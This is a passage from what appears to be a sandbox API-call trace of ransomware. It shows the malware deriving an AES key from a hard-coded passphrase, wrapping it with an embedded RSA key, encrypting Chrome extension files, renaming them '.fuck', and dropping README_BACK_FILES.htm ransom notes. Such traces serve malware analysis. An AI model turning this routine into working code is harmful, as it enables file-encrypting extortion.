data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json")) returned 0x20 [0249.358] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json", dwFileAttributes=0x80) returned 1 [0249.359] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.359] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.360] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.360] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.362] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.362] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.362] CryptHashData (hHash=0x2938978, pbData=0x28cb5d0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.362] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.362] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.362] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.362] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293fa98) returned 1 [0249.363] CryptImportPublicKeyInfo (in: hCryptProv=0x293fa98, dwCertEncodingType=0x1, pInfo=0x2932380*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29323b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29323b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2938278) returned 1 [0249.363] CryptEncrypt (in: hKey=0x2938278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.363] CryptEncrypt (in: hKey=0x2938278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293ff60*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293ff60*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.363] WriteFile (in: hFile=0x5d58, lpBuffer=0x293ff60*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293ff60*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.364] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xd9, lpOverlapped=0x0) returned 1 [0249.366] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd9, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xe0) returned 1 [0249.366] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xe0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xe0, lpOverlapped=0x0) returned 1 [0249.366] CloseHandle (hObject=0x5d5c) returned 1 [0249.366] CloseHandle (hObject=0x5d58) returned 1 [0249.366] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), bFailIfExists=0) returned 1 [0249.369] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json", dwFileAttributes=0x0) returned 1 [0249.369] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.gsg")) returned 1 [0249.371] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\messages.json.fuck")) returned 1 [0249.372] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.372] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.372] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.372] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.372] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.372] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\readme_back_files.htm")) returned 0xffffffff [0249.373] AreFileApisANSI () returned 1 [0249.373] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3700, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.373] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\nl\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.373] GetFileType (hFile=0x5d54) returned 0x1 [0249.373] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.374] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.374] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.374] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.374] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.374] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.374] GetLastError () returned 0x0 [0249.374] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json")) returned 0x20 [0249.375] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json", dwFileAttributes=0x80) returned 1 [0249.376] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.376] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.376] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.377] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.378] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.378] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.379] CryptHashData (hHash=0x2938978, pbData=0x28cb468, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.379] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.379] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.379] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.379] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293f4c0) returned 1 [0249.379] CryptImportPublicKeyInfo (in: hCryptProv=0x293f4c0, dwCertEncodingType=0x1, pInfo=0x29338a0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x29338d0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x29338d8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29382f8) returned 1 [0249.379] CryptEncrypt (in: hKey=0x29382f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.379] CryptEncrypt (in: hKey=0x29382f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x293fba8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x293fba8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0249.379] WriteFile (in: hFile=0x5d5c, lpBuffer=0x293fba8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x293fba8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0249.380] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xc3, lpOverlapped=0x0) returned 1 [0249.381] CryptEncrypt (in: hKey=0x2937738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xd0) returned 1 [0249.381] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xd0, lpOverlapped=0x0) returned 1 [0249.381] CloseHandle (hObject=0x5d58) returned 1 [0249.381] CloseHandle (hObject=0x5d5c) returned 1 [0249.382] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), bFailIfExists=0) returned 1 [0249.384] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json", dwFileAttributes=0x0) returned 1 [0249.384] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.gsg")) returned 1 [0249.385] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\messages.json.fuck")) returned 1 [0249.386] CryptDestroyHash (hHash=0x2938978) returned 1 [0249.386] CryptDestroyKey (hKey=0x2937738) returned 1 [0249.386] CryptReleaseContext (hProv=0x293d3d0, dwFlags=0x0) returned 1 [0249.386] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0249.386] FindClose (in: hFindFile=0x29387f8 | out: hFindFile=0x29387f8) returned 1 [0249.386] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\readme_back_files.htm")) returned 0xffffffff [0249.386] AreFileApisANSI () returned 1 [0249.386] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 153 [0249.386] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\no\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0249.387] GetFileType (hFile=0x5d54) returned 0x1 [0249.387] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0249.388] FindNextFileA (in: hFindFile=0x29385b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0249.388] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x29387f8 [0249.388] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.388] FindNextFileA (in: hFindFile=0x29387f8, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0249.388] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0249.388] GetLastError () returned 0x0 [0249.388] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json")) returned 0x20 [0249.389] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json", dwFileAttributes=0x80) returned 1 [0249.389] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0249.389] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0249.390] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0249.390] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x293d3d0) returned 1 [0249.392] CryptCreateHash (in: hProv=0x293d3d0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0249.392] lstrlenA (lpString="jXUsvFjvtnzONPctpfadKqUJzMlQm") returned 29 [0249.392] CryptHashData (hHash=0x2938978, pbData=0x28cb328, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0249.392] CryptDeriveKey (in: hProv=0x293d3d0, Algid=0x6610, hBaseData=0x2938978, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2937738) returned 1 [0249.392] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----j", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0249.392] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0249.392] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x293f548) returned 1 [0249.393] CryptImportPublicKeyInfo (in: hCryptProv=0x293f548, dwCertEncodingType=0x1, pInfo=0x2933630*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933660*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933668*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2937bb8) returned 1 [0249.393] CryptEncrypt (in: hKey=0x2937bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0249.393] CryptEncrypt (in: hKey=0x2937bb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2940180*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2940180*, 